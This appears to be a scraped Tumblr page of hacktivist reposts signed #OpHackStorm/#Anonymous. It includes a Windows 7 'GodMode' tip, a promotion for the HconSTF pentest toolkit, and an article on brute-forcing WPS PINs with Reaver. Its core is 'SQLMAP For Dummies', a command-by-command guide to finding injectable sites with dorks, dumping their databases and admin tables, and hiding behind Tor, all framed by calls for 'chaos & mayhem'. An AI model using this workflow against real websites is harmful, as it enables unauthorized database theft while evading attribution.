
Here’s a neat Windows 7 trick that’s been doing the rounds on the Internet. It enables “GodMode,” a term devised by the Microsoft development team, which provides a single place to access all Windows settings without needing to browse options and folders in the Control Panel.
To use it:
- Create a new folder.

- Rename the folder to:
- The folder icon will change — double click it to show the GodModewindow:
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
(note that you can change the “GodMode” text, but the following period and code number are essential).

The window shows nearly 50 sections with quick links to configuration options. Strictly speaking, it’s not a God Mode since all the options are available elsewhere. It’s more akin to an “all tasks” list — but you may find it easier than stumbling through Windows numerous screens and panels.
Big Red Warning!
The trick appears to work on both the 32 and 64-bit versions of Windows 7. Vista 32-bit and Windows Server 2008 32-bit should also work. However, it is known to crash 64-bit versions of Vista — and you may need to boot in safe mode or to the command line to delete the folder.
Share by #OpHackStorm #OpShitStorm Joint-Venture NO©
☣ I’m a Pirate ☠
I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.
Long live the ones who dare..
NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE NO©
☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢
#OpHackStorm ☣
Putting toys in the hands of Boys
#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar
☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢
☠ SHARE ☠ SHARE ☠ SHARE ☠ SHARE
☠ SHARE NO©
☠ SHARE ☠ SHARE ☠ SHARE ☠ SHARE
☠ SHARE NO©


![SQLMAP For Dummies v1.0
Required for use: BackTrack 5 R1
Start your BackTrack 5 R1 (BT5) and start sqlmap, it can be found in /pentest/database/sqlmap/.
Now lets get started!
First we need a webpage, this normally is done by hand or by using dorks in google. To find out if a page is vulnerable to an injection we do this:
http://localhost.com/index.php?id=1337’
Notice the ‘ here: ^
This should give you a pretty error and a good start!
Lets open sqlmap!
So the first you need to learn is options, or settings you have to apply in sqlmap. The base is:
python sqlmap.py -u <website>
With a website we would simply do it like this
python sqlmap.py -u http://localhost/index.php?id=1337
(note we did not add the ‘ here)
-u stands for Url and tells sqlmap THIS is our url. But we have to add more options for sqlmap to work:
(note the following options use double dashes)
- -dbs to find DataBases
- -users to find users.
python sqlmap.py -u http://localhost/index.php?id=1337 - -dbs (and/or) - -users
(for the sake of lenght we will be assuming you used - -dbs in this tutorial)
After this command is ran you should come up with 0 results, or some results. If you read the text you might be able to find some databases, and if you do. Congratz!
Should look like this:
available databases [2]:
[*] database1
[*] database2
Now to the fun part!
python sqlmap.py -u http://localhost/index.php?id=1337 - -tables -D database1
This tells the program to find tables (- -tables) in database (-D) names: database1.
Once you execute this you will find (maybe) tons of tables. Locate the one you want…lets call it admin!
python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin
Now you should see the info of the table admin. But now we should be able to dump it! This can be done by - -dump or - -dump-all.
Examples:
python sqlmap.py -u http://localhost/index.php?id=1337 - -tables -D database1 - -dump-all
python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin - -dump
- -dump dumps the selected tables content, - -dump-all dumps EVERYTHING!
But, we should be secure?
Tor with SQLMAP:
First find /etc/apt/sources.list open it and add
deb http://deb.torproject.org/torproject.org lucid main
Open the terminal and use this commands:
gpg - -keyserver keys.gnupg.net —recv 886DDD89
gpg - -export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
And now we need more commandos ran as root:
apt-get update apt-get install tor tor-geoipdb apt-get install polipo
Start tor: /etc/init.d/tor start grab the copy of this config file: https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf
Go to /etc/polipoconfig and replace the file with the one above. restart polipo: /etc/init.d/polipo restart
Congratz! now you can run sqlmap with TOR!
python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin —dump —tor —random-agent
Happy safe hacking!
By Matrix Productions NO©™
http://www.twitter.com/TheAnonMatrix
Source:
http://www.coresec.org/2011/04/24/sqlmap-with-tor/
https://www.torproject.org/docs/debian.html.en#ubuntu
Share by #OpHackStorm #OpShitStorm Joint-Venture Putting toys in the hands of Boys #Anonymous #H4ck3rz Will Prepare You to Share chaos & mayhem for #LulzWar
☣ I’m a Pirate ☠ I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢ Long live the ones who dare. UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©](http://25.media.tumblr.com/tumblr_lzb5ypxKyj1r9ch8ko1_1280.jpg)
![Hcon’s Security Testing Framework (Hcon STF) v0.4 [Fire base]
Hcon respects & salutes to all of the freedom fighters of India, without whom we can never be able get our freedom.A tribute to all of the freedom fighters of all the countries we present HconSTF version 0.4 codename ‘Freedom’.Hope this year brings freedom for everyone on the internet form different governments & companies which are making the internet users their slaves.For this purpose HconSTF 0.4 has integrated many functions for anonymity and OSINT.
Some Highlight Features :
Categorized and comprehensive toolset
Contains hundreds of tools and features and script for different tasks like SQLi,XSS,Dorks,OSINT to name a few
HconSTF webUI with online tools (same as the Aqua base version of HconSTF)
Each and every option is configured for penetration testing and Vulnerability assessments
Specially configured and enhanced for gaining easy & solid anonymity
Works for web app testing assessments specially for owasp top 10
Easy to use & collaborative Operating System like interface
Light on Hardware Resources
Portable - no need to install, can work from any USB storage device
Multi-Language support (feature in heavy development translators needed)
Works side-by-side with your normal web browser without any conflict issues
Works on both architectures x86 & x64 on windows XP, Vista, 7 (works with ubuntu linux using wine)
Netbook compatible - User interface is designed for using framework on small screen sizes
Free & Open source and always will be
Categories of tools :
Information gathering / Analysis
Editors / Debuggers
Exploitation / Auditing
Anonymity
Passwords
Cryptography
Database
Scripting / Automation
Network Utilities
Reporting
License :
MPL,GPL,LGPL . in simple words its free as speech , no license fees.
Download Hcon STF v0.4 H3R3:
http://www.hcon.in/downloads.html
Share by #OpHackStorm #OpShitStorm Joint-VenturePutting toys in the hands of Boys#Anonymous #H4ck3rzWill Prepare You to Share chaos & mayhem for #LulzWar☣ I’m a Pirate ☠I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢Long live the ones who dare.UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©](http://24.media.tumblr.com/tumblr_lylbchkKv41r9ch8ko1_1280.jpg)


![Brute Force tools to crack Wi-Fi security in hours, millions of wireless routers vulnerable (Expect Us)
If you set WPA/WPA2 security protocol on your home or small business wireless router, and you think your Wi-Fi is secure, there two recently released brute force tools that attackers may use to bypass your encryption and burst your security bubble. The irony is that the vulnerability which can be exploited was intended to be a security strength, a usability issue to help the technically clueless setup encryption on their wireless networks. Wi-Fi Protected Setup (WPS) is enabled by default on most major brands of wireless routers including Belkin, Buffalo, D-Link, Cisco’s Linksys and Netgear, leaving millions of wireless routers around the world vulnerable to brute force attacks which can crack the Wi-Fi router’s security in two to ten hours.
Most wireless routers come with a WPS personal identification number (PIN) printed on the device. When a user is setting up a wireless home network via a network setup wizard, enabling encryption is often as easy as pushing a button on the router and then entering the eight digit PIN which came with it. When an attacker is attempting to brute force the PIN and an incorrect value was entered, a message is sent that basically tells an attacker if the first half of the PIN was right or not. Additionally, according to Stefan Viehbock, the security researcher who reported the flaw, “The 8th digit of the PIN is always the checksum of digit one to digit seven,” meaning it only takes an attacker about 11,000 brute force guesses to own the password. Unfortunately most wireless routers don’t have a lockout policy after several failed password attempts.
Viehbock reported the Wi-Fi Protected Setup (WPS) PIN brute force vulnerability to the Department of Homeland Security’s U.S. Computer Emergency Readiness Team (US-CERT). US-CERT issued a warning which included, due to a “design flaw” in WPS, “an attacker within range of the wireless access point may be able to brute force the WPS PIN and retrieve the password for the wireless network, change the configuration of the access point, or cause a denial of service….The lack of a proper lock out policy after a certain number of failed attempts to guess the PIN on some wireless routers makes this brute force attack that much more feasible.”
Viehbock released a whitepaper, “Brute forcing Wi-Fi Protected Setup - When poor design meets poor implementation” [PDF] as well as a proof-of-concept brute force tool called wpscrack which is capable of cracking a home Wi-Fi network in about two hours but does not work with all Wi-Fi adapters.
Tactical Network Solutions (TNS), another security team, had also discovered the WPS wireless router flaw that comes enabled by default in “roughly 95% of modern consumer-grade access points.” After the vulnerability went public, TNS released Reaver, an open-source tool that also exploits the vulnerability via a brute force attack. “Once you have the WPS pin you can instantly recover the WPA passphrase, even if the owner changes the passphrase,” TNS reported. “Reaver is capable of breaking WPS pins and recovering the plain text WPA/WPA2 passphrase of the target access point in approximately 4-10 hours (attack time varies based on the access point).”
The US-CERT advisory states, “We are currently unaware of a practical solution to this problem.” The recommended workaround is to disable WPS. “Within the wireless router’s configuration menu, disable the external registrar feature of Wi-Fi Protected Setup (WPS). Depending on the vendor, this may be labeled as external registrar, router PIN, or Wi-Fi Protected Setup.”
#OpHackStorm ☣
Putting toys in the hands of Boys #Anonymous #H4ck3rzWill Prepare You to Share chaos & mayhem for #LulzWar
UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong
☣ I’m a Pirate ☠I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.
Long live the ones who dare..
NO©](http://25.media.tumblr.com/tumblr_lxrlkwG4Zr1r9ch8ko1_1280.jpg)

